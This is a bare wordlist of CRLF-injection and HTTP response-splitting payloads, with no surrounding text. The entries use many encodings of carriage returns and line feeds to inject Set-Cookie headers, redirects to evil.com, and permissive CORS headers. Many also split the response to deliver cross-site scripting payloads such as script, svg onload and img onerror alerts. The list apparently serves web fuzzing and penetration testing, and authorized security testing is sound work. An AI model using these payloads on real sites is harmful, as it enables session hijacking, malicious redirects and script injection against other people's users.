%0d%0a
%0d%0aSet-Cookie:+crlf=injection
%0d%0aContent-Length:+0
%0d%0aHTTP/1.1+200+OK
%0d%0aContent-Type:+text/html
%0d%0aContent-Length:+0
%0d%0aHTTP/1.1+400+Bad+Request
%0d%0aX-XSS-Protection:+0
%0d%0aContent-Type:+text/html%0d%0a%0d%0a<script>alert(1)</script>
%0d%0aContent-Type:+text/html%0d%0a%0d%0a<img+src=x+onerror=alert(document.domain)>
%0a
%0aSet-Cookie:+crlf=injection
%0d
%0dSet-Cookie:+crlf=injection
%0aContent-Type:+text/html%0a%0a<script>alert(1)</script>
%0dContent-Type:+text/html%0d%0d<script>alert(1)</script>
%E5%98%8A%E5%98%8DSet-Cookie:+crlf=injection
%E5%98%8A%E5%98%8D
%0d%0aLocation:+https://evil.com
%0d%0aRefresh:+0;url=https://evil.com
%0d%0a<svg+onload=alert(document.domain)>
%0d%0aAccess-Control-Allow-Origin:+*
%0d%0aAccess-Control-Allow-Methods:+GET,+POST,+PUT,+DELETE
%0d%0aAccess-Control-Allow-Headers:+*
%0d%0aAccess-Control-Allow-Credentials:+true
%0d%0aContent-Length:+99999
%0d%0a%0d%0a<html><script>alert(1)</script></html>
%0dContent-Type:+text/plain%0d%0a%0d%0a<script>alert(1)</script>
%0aContent-Type:+text/plain%0a%0a<script>alert(1)</script>
%25%30%61
%25%30%64
%25%30%64%25%30%61
%u000A
%u000D
%u000D%u000A
%E5%98%8A%E5%98%8D
%c0%af
%c0%a0
%c0%8a
%c0%8d
%e2%80%a8
%e2%80%a9
%c2%85
%0d%0aRefresh:+0;url=https://evil.com%0d%0a
%0d%0aLocation:+https://evil.com%0d%0a
%0aLocation:+https://evil.com%0a
%0DLocation:+https://evil.com%0D
%0D%0ALocation:+https://evil.com%0D%0A
%3F%0D%0ALocation:+https://evil.com%0D%0A
%0ALocation:+https://evil.com%0A
%3F%0ALocation:+https://evil.com%0A
%3F%0DLocation:+https://evil.com%0D
%0D%0ASet-Cookie:+test=value%0D%0A
%0ASet-Cookie:+test=value%0A
%0DSet-Cookie:+test=value%0D
%E5%98%8A%E5%98%8DSet-Cookie:+test=value%E5%98%8A%E5%98%8D
%u000ASet-Cookie:+test=value%u000A
%u000DSet-Cookie:+test=value%u000D
%u000D%u000ASet-Cookie:+test=value%u000D%u000A
%c0%afSet-Cookie:+test=value%c0%af
%c0%a0Set-Cookie:+test=value%c0%a0
%c0%8aSet-Cookie:+test=value%c0%8a
%c0%8dSet-Cookie:+test=value%c0%8d
%e2%80%a8Set-Cookie:+test=value%e2%80%a8
%e2%80%a9Set-Cookie:+test=value%e2%80%a9
%c2%85Set-Cookie:+test=value%c2%85
%EF%BB%BF%0D%0A
%1B%0D%0A
%00%0D%0A
%0D%0A%0D%0A
%0D%0A%0D%0A%0D%0A
%0D%0A?query=bad&value%0D%0A
%253f%0D%0ALocation:+https://evil.com%0D%0A
%2500%0D%0ALocation:+https://evil.com%0D%0A
%2500%0ALocation:+https://evil.com%0A
%2500%0DLocation:+https://evil.com%0D
%0d%0aLOCATION:+https://evil.com%0d%0a
%0D%0ALOCATION:+https://evil.com%0D%0A
%0d%0aSET-COOKIE:+test=value%0d%0a
%0D%0ASET-COOKIE:+test=value%0D%0A
%0d%0a>+Inject+JSON
%0d%0a<+Inject+XML
%0d%0a%0d%0a<script>alert(1)</script>
%0d%0a%0d%0a<img+src=x+onerror=alert(1)>
%0d%0a%0d%0a<svg+onload=alert(1)>
%0d%0a%0d%0a<iframe+src=javascript:alert(1)>
%0d%0a%0d%0a<details+open+ontoggle=alert(1)>
%0d%0a%0d%0a<video+src=x+onerror=alert(1)>
%0d%0a%0d%0a<audio+src=x+onerror=alert(1)>
%0d%0a%0d%0a<marquee+onstart=alert(1)>
%0d%0a%0d%0a<isindex+onmouseover=alert(1)>
%0d%0a%0d%0a<body+onload=alert(1)>
%0d%0a%0d%0a<input+autofocus+onfocus=alert(1)>
%0d%0a%0d%0a<table+background=javascript:alert(1)>
%0d%0a%0d%0a<link+rel=import+href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==>